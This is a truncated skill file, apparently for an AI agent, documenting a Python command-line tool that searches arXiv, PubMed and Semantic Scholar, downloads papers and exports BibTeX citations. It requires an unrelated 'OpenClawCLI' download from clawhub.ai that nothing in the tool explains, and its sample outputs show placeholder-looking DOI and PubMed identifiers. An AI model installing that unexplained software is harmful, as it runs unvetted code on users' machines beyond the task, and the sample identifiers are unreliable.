Automation
academic-research-hub
Use this skill when users need to search academic papers, download research documents, extract citations, or gather.
---
name: academic-research-hub
description: "Use this skill when users need to search academic papers, download research documents, extract citations, or gather scholarly information. Triggers include: requests to \"find papers on\", \"search research about\", \"download academic articles\", \"get citations for\", or any request involving academic databases like arXiv, PubMed, Semantic Scholar, or Google Scholar. Also use for literature reviews, bibliography generation, and research discovery. Requires OpenClawCLI installation from clawhub.ai."
license: Proprietary
---
# Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ **Prerequisite:** Install [OpenClawCLI](https://clawhub.ai/) (Windows, MacOS)
**Installation Best Practices:**
```bash
# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
```
**Never use `--break-system-packages`** as it can damage your system's Python installation.
---
## Quick Reference
| Task | Command |
|------|---------|
| Search arXiv | `python scripts/research.py arxiv "quantum computing"` |
| Search PubMed | `python scripts/research.py pubmed "covid vaccine"` |
| Search Semantic Scholar | `python scripts/research.py semantic "machine learning"` |
| Download papers | `python scripts/research.py arxiv "topic" --download` |
| Get citations | `python scripts/research.py arxiv "topic" --citations` |
| Generate bibliography | `python scripts/research.py arxiv "topic" --format bibtex` |
| Save results | `python scripts/research.py arxiv "topic" --output results.json` |
---
## Core Features
### 1. Multi-Source Search
Search across multiple academic databases from a single interface.
**Supported Sources:**
- **arXiv** - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- **PubMed** - Biomedical and life sciences literature
- **Semantic Scholar** - Computer science and interdisciplinary research
- **Google Scholar** - Broad academic search (limited, no API)
### 2. Paper Download
Download full-text PDFs when available.
```bash
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
```
### 3. Citation Extraction
Extract and format citations from papers.
**Supported formats:**
- BibTeX
- RIS
- JSON
- Plain text
### 4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
---
## Source-Specific Commands
### arXiv Search
Search the arXiv repository for preprints.
```bash
# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10
```
**Available categories:**
- `cs.AI` - Artificial Intelligence
- `cs.LG` - Machine Learning
- `cs.CV` - Computer Vision
- `cs.CL` - Computation and Language
- `math.CO` - Combinatorics
- `physics.optics` - Optics
- `q-bio.GN` - Genomics
- [Full list](https://arxiv.org/category_taxonomy)
**Output:**
```
1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5
```
### PubMed Search
Search biomedical literature indexed in PubMed.
```bash
# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full text links
python scripts/research.py pubmed "gene therapy" --full-text
```
**Publication types:**
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
**Output:**
```
1. mRNA vaccine effectiveness against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full Text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
```
### Semantic Scholar Search
Search computer science and interdisciplinary research.
```bash
# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references
```
**Output includes:**
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
**Output:**
```
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
```
---
## Essential Options
### Result Limits
Control the number of results returned.
```bash
--max-results N # Default: 10, range: 1-100
```
**Examples:**
```bash
python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50
```
### Output Formats
Choose how results are formatted.
```bash
--format <text|json|bibtex|ris|markdown>
```
**Text** - Human-readable format (default)
```bash
python scripts/research.py arxiv "quantum" --format text
```
**JSON** - Structured data for processing
```bash
python scripts/research.py arxiv "quantum" --format json
```
**BibTeX** - For LaTeX documents
```bash
python scripts/research.py arxiv "quantum" --format bibtex
```
**RIS** - For reference managers (Zotero, Mendeley)
```bash
python scripts/research.py arxiv "quantum" --format ris
```
**Markdown** - For documentation
```bash
python scripts/research.py arxiv "quantum" --format markdown
```
### Save to File
Save results to a file.
```bash
--output <filepath>
```
**Examples:**
```bash
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib
```
### Download Papers
Download full-text PDFs when available.
```bash
--download
--output-dir <directory> # Where to save PDFs (default: downloads/)
```
**Examples:**
```bash
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
```
---
## Advanced Features
### Citation Extraction
Extract citations from papers.
```bash
--citations # Extract citations
--citation-format <format> # bibtex, ris, json (default: bibtex)
```
**Example:**
```bash
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
```
### Date Filtering
Filter by publication date.
**arXiv:**
```bash
--year <YYYY> # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
```
**PubMed:**
```bash
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
```
**Examples:**
```bash
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31
```
### Author Search
Search for papers by specific authors.
```bash
--author "Last, First"
```
**Examples:**
```bash
python scripts/research.py arxiv "neural networks" --author "Hinton, Geoffrey"
python scripts/research.py semantic "deep learning" --author "Bengio, Yoshua"
```
### Sort Options
Sort results by different criteria.
```bash
--sort-by <relevance|date|citations>
```
**Examples:**
```bash
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
```
---
## Common Workflows
### Literature Review
Gather papers on a topic for a literature review.
```bash
# Step 1: Search multiple sources
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format json --output arxiv_gnn.json
python scripts/research.py semantic "graph neural networks" --max-results 20 --format json --output semantic_gnn.json
# Step 2: Download key papers
python scripts/research.py arxiv "graph neural networks" --download --max-results 10 --output-dir papers/gnn/
# Step 3: Generate bibliography
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format bibtex --output gnn_references.bib
```
### Finding Recent Research
Track the latest papers in a field.
```bash
# Last year's papers
python scripts/research.py arxiv "large language models" --year 2023 --sort-by date --max-results 30
# Last month's biomedical papers
python scripts/research.py pubmed "gene therapy" --start-date 2023-11-01 --end-date 2023-11-30 --format markdown --output recent_gene_therapy.md
```
### Highly Cited Papers
Find influential papers in a field.
```bash
python scripts/research.py semantic "reinforcement learning" --min-citations 500 --sort-by citations --max-results
... (truncated)
automation
By
Comments
Sign in to leave a comment